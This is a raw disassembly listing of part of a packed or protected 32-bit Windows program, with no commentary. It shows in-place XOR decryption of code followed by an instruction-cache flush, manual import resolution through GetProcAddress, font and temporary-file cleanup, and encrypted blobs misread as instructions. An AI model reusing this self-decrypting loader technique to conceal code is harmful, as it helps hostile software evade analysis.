dd 0FCF08589h, 8D8BFFFFh, 0FFFFFCF0h, 9588118Ah, 0FFFFFCEFh
dd 0FCF4858Bh, 103AFFFFh, 0BD804675h, 0FFFFFCEFh, 8B317400h
dd 0FFFCF08Dh, 1518AFFh, 0FCEE9588h, 858BFFFFh, 0FFFFFCF4h
dd 7501503Ah, 0F0858323h, 2FFFFFCh, 0FCF48583h, 8002FFFFh
dd 0FFFCEEBDh, 0AE7500FFh, 0FCE885C7h, 0FFFFh, 0BEB0000h
dd 0D983C91Bh, 0E88D89FFh, 8BFFFFFCh, 0FFFCE895h, 0E49589FFh
dd 83FFFFFCh, 0FFFCE4BDh, 57D00FFh, 0B5E9h, 6908A100h
dd 0C083004Eh, 0E0858910h, 8BFFFFFCh, 0FFFD2C8Dh, 8B118BFFh
dd 85890C42h, 0FFFFFCDCh, 0FCDC8D8Bh, 118AFFFFh, 0FCDB9588h
dd 858BFFFFh, 0FFFFFCE0h, 4675103Ah, 0FCDBBD80h, 7400FFFFh
dd 0DC8D8B31h, 8AFFFFFCh, 95880151h, 0FFFFFCDAh, 0FCE0858Bh
dd 503AFFFFh, 83237501h, 0FFFCDC85h, 858302FFh, 0FFFFFCE0h
dd 0DABD8002h, 0FFFFFCh, 85C7AE75h, 0FFFFFCD4h, 0
; ---------------------------------------------------------------------------
jmp short loc_4D93B1
; ---------------------------------------------------------------------------
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
mov [ebp-32Ch], ecx
loc_4D93B1: ; CODE XREF: _4:004D93A4�j
mov edx, [ebp-32Ch]
mov [ebp-330h], edx
cmp dword ptr [ebp-330h], 0
jnz short loc_4D93C8
jmp short loc_4D93DE
; ---------------------------------------------------------------------------
loc_4D93C8: ; CODE XREF: _4:004D93C4�j
mov eax, [ebp-2D4h]
mov ecx, [eax]
add ecx, 10h
mov [ebp-2D4h], ecx
jmp near ptr dword_4D8F34+349h
; ---------------------------------------------------------------------------
loc_4D93DE: ; CODE XREF: _4:004D93C6�j
mov edx, [ebp-20h]
mov eax, [ebp-2D4h]
mov ecx, [eax]
mov [edx+10h], ecx
mov edx, [ebp-2D4h]
mov eax, [ebp-20h]
mov [edx], eax
mov ecx, ds:dword_4E6908
mov edx, [ecx+4]
add edx, [ebp-6Ch]
mov eax, ds:dword_4E6908
mov [eax+4], edx
mov dword ptr [ebp-24h], 0
mov dword ptr [ebp-20h], 0
mov dword ptr [ebp-4], 0FFFFFFFFh
call sub_4D9427
jmp short loc_4D9474
; =============== S U B R O U T I N E =======================================
sub_4D9427 proc near ; CODE XREF: _4:004D9420�p
; DATA XREF: _5:004E3428�o
cmp dword ptr [ebp-28h], 0FFFFFFFFh
jz short loc_4D9437
mov ecx, [ebp-28h]
push ecx
call ds:dword_4E66A4 ;; CloseHandle
loc_4D9437: ; CODE XREF: sub_4D9427+4�j
cmp dword ptr [ebp-24h], 0
jz short loc_4D9455
mov edx, [ebp-24h]
mov [ebp-300h], edx
mov eax, [ebp-300h]
push eax
call sub_4DD3DD
add esp, 4
loc_4D9455: ; CODE XREF: sub_4D9427+14�j
cmp dword ptr [ebp-20h], 0
jz short locret_4D9473
mov ecx, [ebp-20h]
mov [ebp-304h], ecx
mov edx, [ebp-304h]
push edx
call sub_4DD3DD
add esp, 4
locret_4D9473: ; CODE XREF: sub_4D9427+32�j
retn
sub_4D9427 endp
; ---------------------------------------------------------------------------
loc_4D9474: ; CODE XREF: _4:004D9425�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D9490 proc near ; CODE XREF: sub_4D7DD0+623�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_4E = byte ptr -4Eh
var_4D = byte ptr -4Dh
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004D96B5 SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3430
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFB8h
push ebx
push esi
push edi
mov [ebp+var_1C], 0
mov [ebp+var_4], 0
mov eax, ds:dword_4E6908
mov dword ptr [eax+0Ch], 0
mov ecx, ds:dword_4E6908
mov edx, [ecx+4]
shl edx, 4
push edx
call sub_4DD35A
add esp, 4
mov [ebp+var_40], eax
mov eax, [ebp+var_40]
mov [ebp+var_1C], eax
loc_4D94EB: ; CODE XREF: sub_4D9490+1E7�j
mov [ebp+var_34], 0
mov [ebp+var_28], 0
mov [ebp+var_30], 0
mov ecx, ds:dword_4E6908
mov edx, [ecx]
mov [ebp+var_20], edx
jmp short loc_4D9516
; ---------------------------------------------------------------------------
loc_4D950D: ; CODE XREF: sub_4D9490+9E�j
; sub_4D9490+132�j ...
mov eax, [ebp+var_20]
mov ecx, [eax+10h]
mov [ebp+var_20], ecx
loc_4D9516: ; CODE XREF: sub_4D9490+7B�j
cmp [ebp+var_20], 0
jz loc_4D95F9
mov edx, [ebp+var_20]
mov eax, [ebp+var_20]
mov ecx, [edx+14h]
cmp ecx, [eax+18h]
jnz short loc_4D9530
jmp short loc_4D950D
; ---------------------------------------------------------------------------
loc_4D9530: ; CODE XREF: sub_4D9490+9C�j
cmp [ebp+var_30], 0
jz loc_4D95D2
mov edx, [ebp+var_20]
mov eax, [edx+14h]
shl eax, 4
mov ecx, [ebp+var_20]
mov edx, [ecx+4]
add edx, eax
mov [ebp+var_38], edx
mov eax, [ebp+var_30]
mov [ebp+var_48], eax
mov ecx, [ebp+var_38]
mov edx, [ecx]
mov [ebp+var_4C], edx
loc_4D955C: ; CODE XREF: sub_4D9490+FE�j
mov eax, [ebp+var_4C]
mov cl, [eax]
mov [ebp+var_4D], cl
mov edx, [ebp+var_48]
cmp cl, [edx]
jnz short loc_4D9599
cmp [ebp+var_4D], 0
jz short loc_4D9590
mov eax, [ebp+var_4C]
mov cl, [eax+1]
mov [ebp+var_4E], cl
mov edx, [ebp+var_48]
cmp cl, [edx+1]
jnz short loc_4D9599
add [ebp+var_4C], 2
add [ebp+var_48], 2
cmp [ebp+var_4E], 0
jnz short loc_4D955C
loc_4D9590: ; CODE XREF: sub_4D9490+DF�j
mov [ebp+var_54], 0
jmp short loc_4D95A1
; ---------------------------------------------------------------------------
loc_4D9599: ; CODE XREF: sub_4D9490+D9�j
; sub_4D9490+F0�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_54], eax
loc_4D95A1: ; CODE XREF: sub_4D9490+107�j
mov ecx, [ebp+var_54]
mov [ebp+var_58], ecx
mov edx, [ebp+var_58]
mov [ebp+var_3C], edx
cmp [ebp+var_3C], 0
jnz short loc_4D95C7
mov eax, [ebp+var_20]
mov ecx, [eax+14h]
add ecx, 1
mov edx, [ebp+var_20]
mov [edx+14h], ecx
jmp loc_4D950D
; ---------------------------------------------------------------------------
loc_4D95C7: ; CODE XREF: sub_4D9490+121�j
cmp [ebp+var_3C], 0
jle short loc_4D95D2
jmp loc_4D950D
; ---------------------------------------------------------------------------
loc_4D95D2: ; CODE XREF: sub_4D9490+A4�j
; sub_4D9490+13B�j
mov eax, [ebp+var_20]
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
mov edx, [ecx+14h]
shl edx, 4
mov eax, [ebp+var_28]
mov ecx, [eax+4]
add ecx, edx
mov [ebp+var_34], ecx
mov edx, [ebp+var_34]
mov eax, [edx]
mov [ebp+var_30], eax
jmp loc_4D950D
; ---------------------------------------------------------------------------
loc_4D95F9: ; CODE XREF: sub_4D9490+8A�j
cmp [ebp+var_30], 0
jnz short loc_4D9601
jmp short loc_4D967C
; ---------------------------------------------------------------------------
loc_4D9601: ; CODE XREF: sub_4D9490+16D�j
mov ecx, ds:dword_4E6908
mov edx, [ecx+0Ch]
shl edx, 4
mov eax, [ebp+var_1C]
add eax, edx
mov [ebp+var_24], eax
mov ecx, [ebp+var_24]
mov edx, [ebp+var_34]
mov [ecx], edx
mov eax, [ebp+var_24]
mov ecx, [ebp+var_28]
mov [eax+0Ch], ecx
mov edx, [ebp+var_24]
mov dword ptr [edx+8], 0
mov eax, [ebp+var_28]
mov ecx, [ebp+var_34]
sub ecx, [eax+4]
sar ecx, 4
mov edx, [ebp+var_28]
mov eax, [edx+8]
mov edx, [ebp+var_24]
mov eax, [eax+ecx*4]
mov [edx+4], eax
mov ecx, [ebp+var_24]
mov edx, [ecx+4]
mov [ebp+var_2C], edx
mov eax, ds:dword_4E6908
mov ecx, [eax+0Ch]
add ecx, 1
mov edx, ds:dword_4E6908
mov [edx+0Ch], ecx
mov eax, [ebp+var_28]
mov ecx, [eax+14h]
add ecx, 1
mov edx, [ebp+var_28]
mov [edx+14h], ecx
jmp loc_4D94EB
; ---------------------------------------------------------------------------
loc_4D967C: ; CODE XREF: sub_4D9490+16F�j
mov eax, ds:dword_4E6908
mov ecx, [ebp+var_1C]
mov [eax+8], ecx
mov [ebp+var_1C], 0
mov [ebp+var_4], 0FFFFFFFFh
call sub_4D969C
jmp short loc_4D96B5
sub_4D9490 endp
; =============== S U B R O U T I N E =======================================
sub_4D969C proc near ; CODE XREF: sub_4D9490+205�p
; DATA XREF: _5:004E3438�o
cmp dword ptr [ebp-1Ch], 0
jz short locret_4D96B4
mov edx, [ebp-1Ch]
mov [ebp-44h], edx
mov eax, [ebp-44h]
push eax
call sub_4DD3DD
add esp, 4
locret_4D96B4: ; CODE XREF: sub_4D969C+4�j
retn
sub_4D969C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D9490
loc_4D96B5: ; CODE XREF: sub_4D9490+20A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4D9490
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D96D0 proc near ; CODE XREF: sub_4DF0C8+77�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004D97AE SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3440
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE4h
push ebx
push esi
push edi
mov eax, ds:dword_4E68E8
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_4D9714
mov ecx, [ebp+var_24]
add ecx, 10h
push ecx
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov byte ptr [ebp+var_28], 1
jmp short loc_4D9718
; ---------------------------------------------------------------------------
loc_4D9714: ; CODE XREF: sub_4D96D0+2F�j
mov byte ptr [ebp+var_28], 0
loc_4D9718: ; CODE XREF: sub_4D96D0+42�j
mov edx, [ebp+var_28]
and edx, 0FFh
test edx, edx
jz loc_4D97AE
mov [ebp+var_4], 0
cmp ds:dword_4E68E8, 0
jz short loc_4D9783
mov ecx, ds:dword_4E68E8
call sub_4E0A67
loc_4D9744: ; CODE XREF: sub_4D96D0:loc_4D9781�j
lea eax, [ebp+var_1C]
push eax
lea ecx, [ebp+var_20]
push ecx
mov ecx, ds:dword_4E68E8
call sub_4E0A7E
and eax, 0FFh
test eax, eax
jz short loc_4D9783
mov edx, [ebp+var_1C]
cmp dword ptr [edx], 0
jnz short loc_4D9781
mov eax, [ebp+var_20]
mov ecx, [eax]
push ecx
call ds:dword_4E67EC ;; RemoveFontResourceA
mov edx, [ebp+var_1C]
mov eax, [edx+4]
push eax
call ds:dword_4E66C0 ;; DeleteFileA
loc_4D9781: ; CODE XREF: sub_4D96D0+96�j
jmp short loc_4D9744
; ---------------------------------------------------------------------------
loc_4D9783: ; CODE XREF: sub_4D96D0+67�j
; sub_4D96D0+8E�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_4D9791
jmp short loc_4D97AE
sub_4D96D0 endp
; =============== S U B R O U T I N E =======================================
sub_4D9791 proc near ; CODE XREF: sub_4D96D0+BA�p
; DATA XREF: _5:004E3448�o
mov ecx, ds:dword_4E68E8
mov [ebp-2Ch], ecx
cmp dword ptr [ebp-2Ch], 0
jz short locret_4D97AD
mov edx, [ebp-2Ch]
add edx, 10h
push edx
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
locret_4D97AD: ; CODE XREF: sub_4D9791+D�j
retn
sub_4D9791 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D96D0
loc_4D97AE: ; CODE XREF: sub_4D96D0+53�j
; sub_4D96D0+BF�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4D96D0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D97BF proc near ; CODE XREF: sub_4D989D+C�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004D988E SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3450
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_34], edx
mov [ebp+var_30], ecx
mov eax, offset dword_4D2720
push dword ptr [eax+4]
call ds:dword_4E66C4 ;; RtlEnterCriticalSection
and [ebp+var_4], 0
mov eax, [ebp+var_30]
mov eax, [eax]
mov [ebp+var_24], eax
mov eax, [ebp+var_30]
mov eax, [eax-4]
mov [ebp+var_2C], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov ecx, [ebp+var_2C]
sub ecx, eax
mov [ebp+var_1C], ecx
mov eax, [ebp+var_24]
shr eax, 10h
mov ecx, [ebp+var_2C]
add ecx, eax
mov [ebp+var_28], ecx
mov eax, [ebp+var_1C]
mov [ebp+var_20], eax
jmp short loc_4D983A
; ---------------------------------------------------------------------------
loc_4D9833: ; CODE XREF: sub_4D97BF+9D�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_4D983A: ; CODE XREF: sub_4D97BF+72�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_28]
jz short loc_4D985E
mov eax, [ebp+var_1C]
imul eax, 19660Dh
add eax, 3C6EF35Fh
mov ecx, [ebp+var_1C]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+var_1C]
mov [eax], cl
jmp short loc_4D9833
; ---------------------------------------------------------------------------
loc_4D985E: ; CODE XREF: sub_4D97BF+81�j
mov eax, [ebp+var_28]
sub eax, [ebp+var_20]
push eax
push [ebp+var_20]
push ds:dword_4E668C
call ds:dword_4E6670 ;; FlushInstructionCache
or [ebp+var_4], 0FFFFFFFFh
call sub_4D987F
jmp short loc_4D988E
sub_4D97BF endp
; =============== S U B R O U T I N E =======================================
sub_4D987F proc near ; CODE XREF: sub_4D97BF+B9�p
; DATA XREF: _5:004E3458�o
mov eax, offset dword_4D2720
push dword ptr [eax+4]
call ds:dword_4E6754 ;; RtlLeaveCriticalSection
retn
sub_4D987F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D97BF
loc_4D988E: ; CODE XREF: sub_4D97BF+BE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4D97BF
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D989D proc near ; CODE XREF: sub_4D2B7E�j
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
pusha
xor edx, edx
lea ecx, [ebp+arg_0]
call sub_4D97BF
popa
pop edi
pop esi
pop ebx
pop ebp
retn 4
sub_4D989D endp
; ---------------------------------------------------------------------------
loc_4D98B6: ; CODE XREF: _4:004D2B83�j _4:004D2B88�j
mov ecx, 0EF000008h
call sub_4DD342
loc_4D98C0: ; CODE XREF: sub_4D9DC0+12A�p
push ebp
mov ebp, esp
sub esp, 0F8h
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 0
jz loc_4D998A
push 300000h
call sub_4D2B7E
das
pop esp
jmp far ptr 0ACF4h:78C07626h
; ---------------------------------------------------------------------------
db 79h, 51h, 0C5h
dd 0D3767C0Eh, 9A3C1583h, 61222F3Ch, 569A14B2h, 51ACF93Bh
dd 795DE1D6h, 8AC55F6Ch, 6E1F4C7h, 0DDEA9A95h, 847AACBFh
dd 6408A2E6h, 0F0D72036h, 0DEAD53CBh, 0D9318176h, 7A25BFCCh
dd 66815367h, 3D4A3AD5h, 24DA4C5Fh, 0C468C286h, 0A179C1BCh
dd 52068794h, 4B34FCBFh, 5121FE3h, 0D1F96FEFh, 627220C4h
dd 0B1617C44h, 5A424F31h, 7B38D747h, 0B9CB6DC2h, 99A668AAh
dd 1F06D28Ch, 313E4B8Bh, 3278658Bh, 0DED6E3F0h, 95A2B3C9h
dd 9E91AF1Fh, 433950ABh, 90901320h, 0C985C933h
db 75h, 0EEh
; ---------------------------------------------------------------------------
loc_4D998A: ; CODE XREF: _4:004D98D0�j
cmp dword ptr [ebp+8], 0
jz loc_4D9A9D
mov dword ptr [ebp-0E4h], 0
push 5F0000h
call sub_4D2B7E
ja short loc_4D9A0E
xor bl, ah
sahf
cli
inc eax
lodsb
les ebx, [ecx] ; CODE XREF: _4:004D99B2�j
jns short near ptr loc_4D99B0+1
into
test [esi+5C4DBBE2h], bl
; ---------------------------------------------------------------------------
db 0FEh
; ---------------------------------------------------------------------------
adc al, 7
cli
cdq
mov cl, [esi+eax*8]
mov ecx, 0F36FEBACh
add cl, [esi+ebx*2+58434451h]
retn 310h
; ---------------------------------------------------------------------------
dw 9DF6h
dd 0DFB43472h, 818E9B43h, 4DB11D00h, 0E893340h, 1A0D3981h
dd 0C745F0A4h, 7D8A64DEh, 0BA241770h, 63222F3Ch, 0E1EE187Ah
dd 521A50D4h, 0F1916C2Ch, 2A525F02h, 6B33E757h
db 29h
byte_4D9A0D db 7Dh ; CODE XREF: _4:004D9A36�j
; ---------------------------------------------------------------------------
loc_4D9A0E: ; CODE XREF: _4:004D99A8�j
sti
test eax, 0A9B628A2h
pushf
loc_4D9A15: ; CODE XREF: _4:004D9A20�j
sti
enter 68AAh, 5Bh
dec esi
cmp eax, 4F6ED00Dh
jecxz short loc_4D9A15
out 0D9h, al
mov eax, 65B38C81h
loc_4D9A29: ; CODE XREF: _4:004D9A49�j
xchg esp, ds:0C1542B53h[eax]
cmp al, 78h
bound edi, [ebx+1Bh]
out dx, eax
loop near ptr byte_4D9A0D
mov esi, 94A141C9h
xchg ecx, [esi]
pop es
mov edx, [ebx+46h]
cmp [ecx-7199795h], eax
jmp short loc_4D9A29
; ---------------------------------------------------------------------------
db 7Eh
dd 9D45C5B6h, 1DD88390h, 35429036h, 6A19B628h, 0B1251884h
dd 0A6DC5CFBh
; ---------------------------------------------------------------------------
pop es
loc_4D9A65: ; CODE XREF: _4:004D9A67�j
mov ah, ch
jbe short loc_4D9A65
cli
shl dword ptr [esi], 5Ch
sal ch, cl
add ah, [edi+6Fh]
sub [esi], esi
inc ebx
mov eax, 7B88FB59h
nop
nop
xor eax, eax
test eax, eax
; ---------------------------------------------------------------------------
dd 8D8BEE75h, 0FFFFFF1Ch, 0FF088D89h, 958BFFFFh, 0FFFFFF08h
dd 3943E852h, 0C4830000h
db 4
; ---------------------------------------------------------------------------
loc_4D9A9D: ; CODE XREF: _4:004D998E�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D9AB0 proc near ; CODE XREF: sub_4D9D70+29�p
; sub_4D9DC0+234�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3A = byte ptr -3Ah
var_39 = byte ptr -39h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 48h
mov [ebp+var_4], 1
mov [ebp+var_8], 0
jmp short loc_4D9ACC
; ---------------------------------------------------------------------------
loc_4D9AC3: ; CODE XREF: sub_4D9AB0+106�j
; sub_4D9AB0+2A8�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_4D9ACC: ; CODE XREF: sub_4D9AB0+11�j
mov ecx, [ebp+var_8]
imul ecx, 14h
mov edx, [ebp+arg_0]
cmp dword ptr [edx+ecx+0Ch], 0
jnz short loc_4D9AE1
jmp loc_4D9D5D
; ---------------------------------------------------------------------------
loc_4D9AE1: ; CODE XREF: sub_4D9AB0+2A�j
mov eax, [ebp+var_8]
imul eax, 14h
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
add edx, [ecx+eax]
mov [ebp+var_C], edx
mov eax, [ebp+var_8]
imul eax, 14h
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
add edx, [ecx+eax+10h]
mov [ebp+var_20], edx
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
cmp ecx, [eax+34h]
jnz short loc_4D9B19
mov edx, [ebp+var_20]
mov [ebp+var_C], edx
jmp short loc_4D9B27
; ---------------------------------------------------------------------------
loc_4D9B19: ; CODE XREF: sub_4D9AB0+5F�j
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jnz short loc_4D9B27
mov ecx, [ebp+var_20]
mov [ebp+var_C], ecx
loc_4D9B27: ; CODE XREF: sub_4D9AB0+67�j
; sub_4D9AB0+6F�j
mov [ebp+var_14], 0
mov edx, [ebp+var_8]
imul edx, 14h
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
add ecx, [eax+edx+0Ch]
mov [ebp+var_24], ecx
cmp [ebp+arg_14], 0
jz short loc_4D9B5A
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+arg_14]
push eax
call sub_4DA75D
add esp, 8
mov [ebp+var_14], eax
loc_4D9B5A: ; CODE XREF: sub_4D9AB0+95�j
cmp [ebp+var_14], 0
jnz short loc_4D9B6C
mov ecx, [ebp+var_24]
push ecx
call sub_4DFF8C
mov [ebp+var_14], eax
loc_4D9B6C: ; CODE XREF: sub_4D9AB0+AE�j
mov edx, [ebp+var_8]
imul edx, 14h
mov eax, [ebp+arg_0]
xor ecx, ecx
cmp dword ptr [eax+edx+4], 0FFFFFFFEh
setnz cl
mov byte ptr [ebp+var_1C], cl
mov edx, [ebp+var_8]
imul edx, 14h
mov eax, [ebp+arg_0]
cmp dword ptr [eax+edx+4], 0
jnz short loc_4D9B9F
mov ecx, [ebp+var_1C]
and ecx, 0FFh
test ecx, ecx
jz short loc_4D9BDD
loc_4D9B9F: ; CODE XREF: sub_4D9AB0+E0�j
mov edx, [ebp+arg_10]
and edx, 0FFh
test edx, edx
jz short loc_4D9BBD
cmp [ebp+var_14], 0
jnz short loc_4D9BBB
mov [ebp+var_4], 0
jmp loc_4D9AC3
; ---------------------------------------------------------------------------
loc_4D9BBB: ; CODE XREF: sub_4D9AB0+100�j
jmp short loc_4D9BDD
; ---------------------------------------------------------------------------
loc_4D9BBD: ; CODE XREF: sub_4D9AB0+FA�j
mov eax, [ebp+var_24]
push eax
call sub_4DFE83
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4D9BDD
mov ecx, [ebp+var_24]
push ecx
push offset aTheDynamicLink ; "The dynamic link library '%s' could not"...
call sub_4DD4F7
loc_4D9BDD: ; CODE XREF: sub_4D9AB0+ED�j
; sub_4D9AB0:loc_4D9BBB�j ...
mov edx, ds:off_4E5BE8
mov [ebp+var_18], edx
mov eax, [ebp+arg_C]
mov ds:off_4E5BE8, eax
push 0
call ds:dword_4E6718 ;; GetModuleHandleA
cmp eax, [ebp+arg_4]
jnz short loc_4D9C62
mov [ebp+var_34], offset aExecutable ; "EXECUTABLE"
mov ecx, [ebp+arg_C]
mov [ebp+var_38], ecx
loc_4D9C08: ; CODE XREF: sub_4D9AB0+18A�j
mov edx, [ebp+var_38]
mov al, [edx]
mov [ebp+var_39], al
mov ecx, [ebp+var_34]
cmp al, [ecx]
jnz short loc_4D9C45
cmp [ebp+var_39], 0
jz short loc_4D9C3C
mov edx, [ebp+var_38]
mov al, [edx+1]
mov [ebp+var_3A], al
mov ecx, [ebp+var_34]
cmp al, [ecx+1]
jnz short loc_4D9C45
add [ebp+var_38], 2
add [ebp+var_34], 2
cmp [ebp+var_3A], 0
jnz short loc_4D9C08
loc_4D9C3C: ; CODE XREF: sub_4D9AB0+16B�j
mov [ebp+var_40], 0
jmp short loc_4D9C4D
; ---------------------------------------------------------------------------
loc_4D9C45: ; CODE XREF: sub_4D9AB0+165�j
; sub_4D9AB0+17C�j
sbb edx, edx
sbb edx, 0FFFFFFFFh
mov [ebp+var_40], edx
loc_4D9C4D: ; CODE XREF: sub_4D9AB0+193�j
mov eax, [ebp+var_40]
mov [ebp+var_44], eax
cmp [ebp+var_44], 0
jz short loc_4D9C62
mov [ebp+var_48], 0
jmp short loc_4D9C69
; ---------------------------------------------------------------------------
loc_4D9C62: ; CODE XREF: sub_4D9AB0+149�j
; sub_4D9AB0+1A7�j
mov [ebp+var_48], 1
loc_4D9C69: ; CODE XREF: sub_4D9AB0+1B0�j
mov cl, byte ptr [ebp+var_48]
mov byte ptr [ebp+var_10], cl
jmp short loc_4D9C83
; ---------------------------------------------------------------------------
loc_4D9C71: ; CODE XREF: sub_4D9AB0:loc_4D9D3A�j
mov edx, [ebp+var_20]
add edx, 4
mov [ebp+var_20], edx
mov eax, [ebp+var_C]
add eax, 4
mov [ebp+var_C], eax
loc_4D9C83: ; CODE XREF: sub_4D9AB0+1BF�j
mov ecx, [ebp+var_20]
cmp dword ptr [ecx], 0
jz loc_4D9D3F
mov edx, [ebp+var_C]
cmp dword ptr [edx], 0
jz loc_4D9D3F
mov eax, [ebp+var_8]
imul eax, 14h
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax+4], 0
jnz short loc_4D9CB8
mov edx, [ebp+var_1C]
and edx, 0FFh
test edx, edx
jz short loc_4D9D16
loc_4D9CB8: ; CODE XREF: sub_4D9AB0+1F9�j
mov eax, [ebp+var_C]
mov ecx, [eax]
and ecx, 80000000h
test ecx, ecx
jnz short loc_4D9CEA
mov edx, [ebp+var_C]
mov eax, [ebp+arg_4]
add eax, [edx]
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
add ecx, 2
push ecx
mov edx, [ebp+var_14]
push edx
call ds:dword_4E6728 ;; GetProcAddress
mov ecx, [ebp+var_20]
mov [ecx], eax
jmp short loc_4D9D16
; ---------------------------------------------------------------------------
loc_4D9CEA: ; CODE XREF: sub_4D9AB0+215�j
mov edx, [ebp+var_C]
mov eax, [edx]
and eax, 0FFFFh
mov [ebp+var_30], eax
mov ecx, [ebp+var_30]
push ecx
mov edx, [ebp+var_14]
push edx
call ds:dword_4E6728 ;; GetProcAddress
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_4D9D16
mov eax, [ebp+var_20]
mov ecx, [ebp+var_2C]
mov [eax], ecx
loc_4D9D16: ; CODE XREF: sub_4D9AB0+206�j
; sub_4D9AB0+238�j ...
mov edx, [ebp+var_10]
and edx, 0FFh
test edx, edx
jz short loc_4D9D3A
mov eax, [ebp+var_24]
push eax
mov ecx, ds:off_4E5BE8
push ecx
mov edx, [ebp+var_20]
push edx
call sub_4DA3D0
add esp, 0Ch
loc_4D9D3A: ; CODE XREF: sub_4D9AB0+271�j
jmp loc_4D9C71
; ---------------------------------------------------------------------------
loc_4D9D3F: ; CODE XREF: sub_4D9AB0+1D9�j
; sub_4D9AB0+1E5�j
mov eax, [ebp+var_18]
mov ds:off_4E5BE8, eax
mov ecx, [ebp+var_8]
imul ecx, 14h
mov edx, [ebp+arg_0]
mov dword ptr [edx+ecx+4], 0FFFFFFFEh
jmp loc_4D9AC3
; ---------------------------------------------------------------------------
loc_4D9D5D: ; CODE XREF: sub_4D9AB0+2C�j
mov al, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4D9AB0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D9D70 proc near ; CODE XREF: sub_4DABD7+1B8�p
; sub_4DB14D+45�p
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
